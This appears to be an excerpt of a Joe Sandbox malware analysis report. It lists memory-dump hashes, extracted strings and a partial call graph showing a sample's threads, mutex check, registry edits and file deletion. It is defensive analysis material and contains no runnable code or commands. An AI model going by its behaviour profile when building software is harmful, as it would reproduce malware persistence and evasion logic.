• Opcode ID: 98e286dd661c9d8fef851db5bc9a8c1be5e8afba07d1fbd0fad9b6dca20c2cc8
• Instruction ID: a94a2ca21092162f2b4ddb21ba345cfe20e58fe2530c3674017bce1cb02feaf9
• Opcode Fuzzy Hash: 98e286dd661c9d8fef851db5bc9a8c1be5e8afba07d1fbd0fad9b6dca20c2cc8
• Instruction Fuzzy Hash: 430152B06007028FD7249F68D884B5A77E9FF85328F504A69E469C7390DF70AC45C751

Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3d2a910d5cff178644101a9deee5c4b7eec4c15f16559f155e4b8c876290d72b
• Instruction ID: bd180dc6a19b1a76a1b30f5956fd385d4058e6d53b460457d41167ea49d86bd8
• Opcode Fuzzy Hash: 3d2a910d5cff178644101a9deee5c4b7eec4c15f16559f155e4b8c876290d72b
• Instruction Fuzzy Hash: 4B01A7703107058FD724D769C441B5AB3F9EFC9329F54882EE80997254CB74E94AC791

Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6cdff11ac3e1116a1529bf6e512d679767435214d8c984f41f583ab7e2ba2713
• Instruction ID: e3cdf28c03dd43be916cc48e9c2608349003ea0baf2457817ca8f3e079ea4287
• Opcode Fuzzy Hash: 6cdff11ac3e1116a1529bf6e512d679767435214d8c984f41f583ab7e2ba2713
• Instruction Fuzzy Hash: 2E01F1B1304640CFC725CF38D948C687BF9AF8221970804AEE055DF272DA35D845CB21

Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 107146ae4d186fbeed1e191954df1cf11d74ff19dcbef50d064a98ad44fd71b0
• Instruction ID: a9b7210563a99e0cf7299b767ef8a1ac30f62d65e37cb169c700ebd5003b83e7
• Opcode Fuzzy Hash: 107146ae4d186fbeed1e191954df1cf11d74ff19dcbef50d064a98ad44fd71b0
• Instruction Fuzzy Hash: 9D0178B23087029FCB2ACA68D500376BBF9AF45319F0488BFD045E76A1D775E882C741

Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7e52f8dd3ba40c3f1cc9ff670f677deff11d710cf2ec82dfd9e0bb430a8245d9
• Instruction ID: a6512293440b86025da30078cae11da3cf4711b2003ba0301e4470818b8b314e
• Opcode Fuzzy Hash: 7e52f8dd3ba40c3f1cc9ff670f677deff11d710cf2ec82dfd9e0bb430a8245d9
• Instruction Fuzzy Hash: 7CF04F71204B118FC721DA08D4808A6FBA5FF85721315C65AD49ACBB42C734F942CBD0

Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 526a87b332aba07b914c357f9715a83d05309cc423b7e81293365e3272101c2b
• Instruction ID: 72e8dba19f8810bea1ccdc321968b96d214d7e3623bc9bc3cbb226ccb37f2e3c
• Opcode Fuzzy Hash: 526a87b332aba07b914c357f9715a83d05309cc423b7e81293365e3272101c2b
• Instruction Fuzzy Hash: E0F081B27055269BC3148B18A4445FBFAE4FF94621F0541BFE00D8B250CF21E845C7A1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 637dafa83f818fb6803b556ecc929f7acd8fac93baceff3ef14d801d4203a2fc
                                                                                                                                                                                                                                            • Instruction ID: 1591e93e29f2232ba04f91c2e18e507d1fc0d444dd2232aa301dbf33d3c55cf5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 637dafa83f818fb6803b556ecc929f7acd8fac93baceff3ef14d801d4203a2fc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AF0FCB1704705DBDB28CA19D440766B7FAEF4431CF10497DD449976A0EB71E982C750
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f6e1eaf329d1be780fb3011dde2f39683830cfe2ee49501284a22a636bde8e4a
                                                                                                                                                                                                                                            • Instruction ID: 783a3dde1653c236c90597b79f070b5b28bb81b76fc6acbff4f91fcf55d0f54c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6e1eaf329d1be780fb3011dde2f39683830cfe2ee49501284a22a636bde8e4a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC01F671B00600CF8B18CF29D484898B7F6FF8931575590AAD4059B272DB31EC45CF50
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2b4fde4c7090cec1140cb33b0083f8eb46c5f0727f1de52d60cccd4ad4f72645
                                                                                                                                                                                                                                            • Instruction ID: 04b11002f594ed1799dbb532c3cb3652af44471ac51f5e936b7b327367bc3b6b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b4fde4c7090cec1140cb33b0083f8eb46c5f0727f1de52d60cccd4ad4f72645
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1F0BEB07142058FC628EA3DC844B6A33DAEFC02B9F058869D216CB320DE30BC05D792
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f4196565dc33e59ddb93445685e78eb3c499de935b3e83bab17e43883366af57
                                                                                                                                                                                                                                            • Instruction ID: ac7912993a561b3e5bf817abeb7cc53757cd0efc6cc4d455adbe76374be7ed29
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4196565dc33e59ddb93445685e78eb3c499de935b3e83bab17e43883366af57
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DF0C2B0300706CFD7149B78D950BA673B8BF40716F008AAEE059CB2B1DF70A841DB61
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 31e18539d5b942a38f2e4fc951e4980fb370c9be0a270dd42570e097f4370335
                                                                                                                                                                                                                                            • Instruction ID: 7dba81f448e3db55300354124a53c05068ed19989b3c01fd242fb1c39fdd5ceb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31e18539d5b942a38f2e4fc951e4980fb370c9be0a270dd42570e097f4370335
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31F055B97085E08FC70127A864680BC3FA2FFC7206300059EE143CB762EF289517D782
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d982763427fe2d10e388e547c17d7d891e0a460b2ea4fc2a2a5a438309664ee5
                                                                                                                                                                                                                                            • Instruction ID: f48089dacd1e835c4a5d166172e4a427c6aa3504d4d9954c21f4995502d2367d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d982763427fe2d10e388e547c17d7d891e0a460b2ea4fc2a2a5a438309664ee5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8701B675A00619CFCB14DF68C884A99B7B1FF48314F1586A9E559AB2A1CB34AC45CFA0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 6fff2936a4cd622109e07c9dc304c6ae8e91ad9b6383d209549c90d624c45bc0
                                                                                                                                                                                                                                            • Instruction ID: ab6a7f532a861272661b7c1c4232729890160ecd878ef2dd63f5e0f4911bf630
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fff2936a4cd622109e07c9dc304c6ae8e91ad9b6383d209549c90d624c45bc0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70E026F9710662074E18216D541003B25DF9BC5BE530C403BD505C7390FD64CC05C6A1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 893e3e9446686b668062a84f4f9ea24c7169fa3a43e2af810fa642bcfb73cda3
                                                                                                                                                                                                                                            • Instruction ID: 5e079abb8f529548c21bd8e1d806f5220f451d6164a3cb8c48e46667edc0bee3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 893e3e9446686b668062a84f4f9ea24c7169fa3a43e2af810fa642bcfb73cda3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CDE026713540005BC208A61E94C887EB7CAEFCE73074044BAF10DC3351CD208C064351
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3a92d21bdb5d176d9553c77d6d234c0b2e84a43196c73f0ce6ca0c3dc40e33ba
                                                                                                                                                                                                                                            • Instruction ID: 57a363f969aa44f29a72da0511111efefc579e98f4734745440b45dfb6e0c83b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a92d21bdb5d176d9553c77d6d234c0b2e84a43196c73f0ce6ca0c3dc40e33ba
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7E026723481215FC30696ACA8548BDABDADFCA43431940F7E20DDB362C9248C064361
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a2ffb97214894071b78dcc886ed83f53ada9389192a538f29db0e3d25fc21f0e
                                                                                                                                                                                                                                            • Instruction ID: 3f292f240ce1bebad818220c94b7f95b8feba7546c7bc285796f75747e65ce0d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2ffb97214894071b78dcc886ed83f53ada9389192a538f29db0e3d25fc21f0e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAD0A7213092620FC61297BCF8146B96FE28ED20B630C01E7D546DF387C5546C0A47D6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 10dd17bc1353c99735f7dca9910fca7cf8a9ca29520801ed82339249c2b4cb7c
                                                                                                                                                                                                                                            • Instruction ID: 1919f52eb49284dbd04477ad4ca5839e75a823a72fd6b3bafa810e8af4ace2c3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10dd17bc1353c99735f7dca9910fca7cf8a9ca29520801ed82339249c2b4cb7c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BAD09279A40109CFCB00CBA4E489AECB7F0FF89319F2441A6D61997221C3716D95CB80
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 193e6a5b2ca4ee1558886a8d73c263d8f3cea7e2247207361ba49d1cfdcdec8b
                                                                                                                                                                                                                                            • Instruction ID: 275599f6ea2c3e19541d34a4fae788a99a95f71ef98661e4d8dac73a6e33ab9b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 193e6a5b2ca4ee1558886a8d73c263d8f3cea7e2247207361ba49d1cfdcdec8b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9D012B0200204CFC708DB28EA85C217BA8FF49708719C5A8E0088F232DB33EC42CAA1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: (hq$Hhq$Hhq$Hhq$Hhq$Hhq$Hhq$PHdq
                                                                                                                                                                                                                                            • API String ID: 0-1374958466
                                                                                                                                                                                                                                            • Opcode ID: 0e62d91803d747de4da7efdf62d4c15da8efd67324466f181af0ed3e6882094a
                                                                                                                                                                                                                                            • Instruction ID: f2a721dee42951084e505e0eeafde9d97c426eb475957f0118dcb46214a020a9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e62d91803d747de4da7efdf62d4c15da8efd67324466f181af0ed3e6882094a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C729C717002258FDB58EB78C89466E7BA7FFC8324B148569D50ADB3A5CE34DC06CB91
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4c4d7308f81e1018fef549fc4cf2851eadc02b4a67b08afc77d467f8345f1e05
                                                                                                                                                                                                                                            • Instruction ID: 4225b4f61966561163e8ccacb96fda747fa5cfbcc42d34af6feb00d0bf5a3603
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c4d7308f81e1018fef549fc4cf2851eadc02b4a67b08afc77d467f8345f1e05
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FA15CB0B101655BDB88FBB8845036F6AEBBFC8254F148568D14ADB3C4DE389D439792
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: @$@$B$B$Hhq
                                                                                                                                                                                                                                            • API String ID: 0-3150279512
                                                                                                                                                                                                                                            • Opcode ID: 168075a71d7cb846944eb8a6f7d0fe182bb3b031fa88618190f10451513e78f4
                                                                                                                                                                                                                                            • Instruction ID: 111865fc0109b19355ff939f7e672d0b9a5c835059377ffa7707da9525b04f82
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 168075a71d7cb846944eb8a6f7d0fe182bb3b031fa88618190f10451513e78f4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1951B0F1700216CFC714DF68D88056ABBF6FF89228724856AE519CB761DB30EC46CB91
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: @$@$B$B
                                                                                                                                                                                                                                            • API String ID: 0-685577651
                                                                                                                                                                                                                                            • Opcode ID: 47d147dff02c15432dc4b5b5280e0ac9709344aec3ec7ba8f1833641a1518c10
                                                                                                                                                                                                                                            • Instruction ID: 2e87c3310ce09eb214370a4a5b7939c35f8374080c2530806df2390b1b71df7b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47d147dff02c15432dc4b5b5280e0ac9709344aec3ec7ba8f1833641a1518c10
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8317CF1B006168FCB24CF69C8848AABBB9FF896587154566E205DB361DB30DD44CBC1

Execution Graph

Execution Coverage: 1.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2%
Total number of Nodes: 685
Total number of Limit Nodes: 21
46823->46824 46826 401e13 11 API calls 46824->46826 46829 40dfd7 CreateThread 46826->46829 46830 40df9f 46827->46830 46828 40df46 46831 401e18 11 API calls 46828->46831 46834 40e004 46829->46834 46835 40dff8 CreateThread 46829->46835 47354 40e54f 82 API calls 46829->47354 47174 43a5f7 39 API calls _swprintf 46830->47174 46833 40df52 46831->46833 46836 401e13 11 API calls 46833->46836 46838 40e019 46834->46838 46839 40e00d CreateThread 46834->46839 46835->46834 47356 410f36 138 API calls 46835->47356 46837 40df5b CreateThread 46836->46837 46837->46809 47357 40196b 49 API calls 46837->47357 46842 40e073 46838->46842 46844 401f66 28 API calls 46838->46844 46839->46838 47358 411524 38 API calls ___scrt_fastfail 46839->47358 46841 40dfac 47175 40b95c 7 API calls 46841->47175 47179 41246e RegOpenKeyExA RegQueryValueExA RegCloseKey 46842->47179 46845 40e046 46844->46845 47177 404c9e 28 API calls 46845->47177 46848 40e08b 46850 40e12a 46848->46850 46852 41ae18 28 API calls 46848->46852 46849 40e053 46851 401f66 28 API calls 46849->46851 47182 40cbac 27 API calls 46850->47182 46853 40e062 46851->46853 46855 40e0a4 46852->46855 47178 41a696 79 API calls 46853->47178 47180 412584 31 API calls 46855->47180 46857 40e12f 47183 413fd4 168 API calls 46857->47183 46858 40e067 46860 401eea 11 API calls 46858->46860 46860->46842 46862 40e0ba 46863 401e13 11 API calls 46862->46863 46866 40e0c5 46863->46866 46864 40e0ed DeleteFileW 46865 40e0f4 46864->46865 46864->46866 46867 41ae18 28 API calls 46865->46867 46866->46864 46866->46865 46868 40e0db Sleep 46866->46868 46869 40e104 46867->46869 46868->46866 47181 41297a RegOpenKeyExW RegDeleteValueW 46869->47181 46871 40e117 46872 401e13 11 API calls 46871->46872 46873 40e121 46872->46873 46874 401e13 11 API calls 46873->46874 46874->46850 46875->46570 46876->46574 46877->46575 46878->46584 46879->46586 46880->46589 46881->46564 46882->46567 46883->46571 46884->46593 46885->46595 46890 44e959 46886->46890 46889 437a27 8 API calls 3 library 
calls 46889->46596 46893 44e972 46890->46893 46892 4336ea 46892->46599 46892->46889 46894 433d3c 5 API calls ___raise_securityfailure 46893->46894 46894->46892 46895->46603 46897 44ddeb 46896->46897 46898 44dde2 46896->46898 46897->46607 46901 44dcd8 48 API calls 5 library calls 46898->46901 46900->46607 46901->46897 46903 41bd32 LoadLibraryA GetProcAddress 46902->46903 46904 41bd22 GetModuleHandleA GetProcAddress 46902->46904 46905 41bd5b 32 API calls 46903->46905 46906 41bd4b LoadLibraryA GetProcAddress 46903->46906 46904->46903 46905->46612 46906->46905 47186 41a64f FindResourceA 46907->47186 46911 40e192 ctype 47198 401f86 46911->47198 46914 401eef 11 API calls 46915 40e1b8 46914->46915 46916 401eea 11 API calls 46915->46916 46917 40e1c1 46916->46917 46918 43a89c _Yarn 21 API calls 46917->46918 46919 40e1d2 ctype 46918->46919 47202 406052 46919->47202 46921 40e205 46921->46614 46923 401fcc 46922->46923 47212 402501 46923->47212 46925 401fea 46925->46617 46946 41afe6 46926->46946 46927 41b056 46928 401eea 11 API calls 46927->46928 46929 41b088 46928->46929 46931 401eea 11 API calls 46929->46931 46930 41b058 47219 403b60 28 API calls 46930->47219 46933 41b090 46931->46933 46936 401eea 11 API calls 46933->46936 46935 41b064 46937 401eef 11 API calls 46935->46937 46939 40d7c6 46936->46939 46940 41b06d 46937->46940 46938 401eef 11 API calls 46938->46946 46947 40e8bd 46939->46947 46941 401eea 11 API calls 46940->46941 46943 41b075 46941->46943 46942 401eea 11 API calls 46942->46946 47220 41bfb9 28 API calls 46943->47220 46946->46927 46946->46930 46946->46938 46946->46942 47217 403b60 28 API calls 46946->47217 47218 41bfb9 28 API calls 46946->47218 46948 40e8ca 46947->46948 46950 40e8da 46948->46950 47221 40200a 11 API calls 46948->47221 46950->46622 46952 40200a 46951->46952 46956 40203a 46952->46956 47222 402654 11 API calls 46952->47222 46954 40202b 47223 4026ba 11 API calls _Deallocate 46954->47223 46956->46624 46958 401d6c 46957->46958 46959 401d74 46958->46959 
47224 401fff 22 API calls 46958->47224 46959->46629 46963 404ccb 46962->46963 47225 402e78 46963->47225 46965 404cee 46965->46636 47234 404bc4 46966->47234 46968 405cf4 46968->46639 46970 401efe 46969->46970 46972 401f0a 46970->46972 47243 4021b9 11 API calls 46970->47243 46972->46643 46974 4021b9 46973->46974 46975 4021e8 46974->46975 47244 40262e 11 API calls _Deallocate 46974->47244 46975->46645 46978 401ec9 46977->46978 46979 401ee4 46978->46979 46980 402325 28 API calls 46978->46980 46979->46653 46980->46979 46982 4085c0 46981->46982 46983 402e78 28 API calls 46982->46983 46984 4085e4 46983->46984 46984->46661 46986 4124e1 RegQueryValueExA RegCloseKey 46985->46986 46987 41250b 46985->46987 46986->46987 46987->46657 47245 401e8f 46988->47245 46990 40bee1 CreateMutexA GetLastError 46990->46669 47247 41b16b 46991->47247 46996 401eef 11 API calls 46997 41a4af 46996->46997 46998 401eea 11 API calls 46997->46998 46999 41a4b7 46998->46999 47000 41a50a 46999->47000 47001 412513 31 API calls 46999->47001 47000->46675 47002 41a4dd 47001->47002 47003 41a4e8 StrToIntA 47002->47003 47004 41a4ff 47003->47004 47005 41a4f6 47003->47005 47007 401eea 11 API calls 47004->47007 47255 41c112 22 API calls 47005->47255 47007->47000 47009 40698f 47008->47009 47010 4124b7 3 API calls 47009->47010 47011 406996 47010->47011 47011->46685 47011->46686 47013 41ae2c 47012->47013 47256 40b027 47013->47256 47015 41ae34 47015->46700 47017 401e27 47016->47017 47019 401e33 47017->47019 47265 402121 11 API calls 47017->47265 47019->46703 47021 402121 47020->47021 47022 402150 47021->47022 47266 402718 11 API calls _Deallocate 47021->47266 47022->46706 47025 40c8ba 47024->47025 47026 40c8da 47025->47026 47027 40c90f 47025->47027 47039 40c8d0 47025->47039 47271 41a75b 29 API calls 47026->47271 47030 41b16b GetCurrentProcess 47027->47030 47029 40ca03 GetLongPathNameW 47267 403b40 47029->47267 47033 40c914 47030->47033 47031 40c8e3 47034 401e18 11 API calls 47031->47034 47036 40c918 47033->47036 
